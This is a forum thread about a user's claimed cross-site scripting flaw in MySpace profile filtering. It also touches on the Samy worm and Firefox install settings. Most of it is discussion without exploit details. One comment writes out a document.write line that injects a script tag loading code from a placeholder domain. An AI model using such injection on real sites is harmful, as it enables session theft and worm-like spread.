Haha, I love MySpace. Totally.

I recently discovered a vulnerability in the way MySpace filters profiles which allows me to insert JavaScript into them. I decide to do The Right Thing, and contact the help desk. I sent a message somewhere along these lines:

That's it. No information about what the vulnerability was or how to reproduce it. Almost a day later, on a Saturday, I receive this response:

Obviously, the method MySpace uses to filter malicious code from pages is inherently unsafe: blacklisting words like "javascript" and "xmlhttprequest". Last year, one user created a worm that in 20 hours had infected 1.8 million people, causing MySpace to shut down for several hours. I am confident that the exploit I have discovered is capable of reproducing such a worm.

Good thing they're fixing it, though. I will just have to be patient.

Myspace seems to me be full of... horribly stylished.. whoknowswhatpages.. I am not even sure what its is there for.

Well, I could document.write('<script src="http://mydomain.com/script.js"> </script>');

See above post, plus the website of the user recently arrested for creating the samy worm last year, http://namb.la

Well are you going to tell us how the exploit works or not?

Hey, I actually like YouTube. Myspace sucks, and so does Digg, but YouTube isn't bad, I actually prefer it to Google Video in terms of video quality (it's not stretched to full browser size to look really shittae).

Digg rocks.

Sorry, I had to say it. Can't have this be a Digg bash fest.

Mine tells me when a website tried to install software, much like when it tries to open a popup.

It's in Options->Security, first checkbox; Mine is checked, but I don't know the default setting.

Its for firefox extensions, plugins, and themes only iirc.

Select edit>preferences>web features. The second option is "Allow websites to install software". By default, this box is checked. Firefox-1.0.8 at least.

[/edit]
This feature can be exploited by creating a "plugin" that captures credit card info.

Bob: as BAF said, that is only exploitable through user interaction. Furthermore, that feature is even more tighty restricted because only certain sites are even allowed to ask user permission.

The exploit I discovered can be initiated without user interaction on Internet Explorer. Under all browsers supporting javascript, it can be activated with user interaction.

I stand corrected. YUM and YUMEX (Linux) do not seem to find the latest versions of Firefox though.

I don't want to give away any details about the vulnerability itself, sorry. But I do have to say that I am truly amazed that no one else has discovered this. Perhaps someone has and is using it to harvest user login information. I don't know, maybe I just spend to much time dealing with HTML parsing so I know the ins and outs better than other people who have drive to break MySpace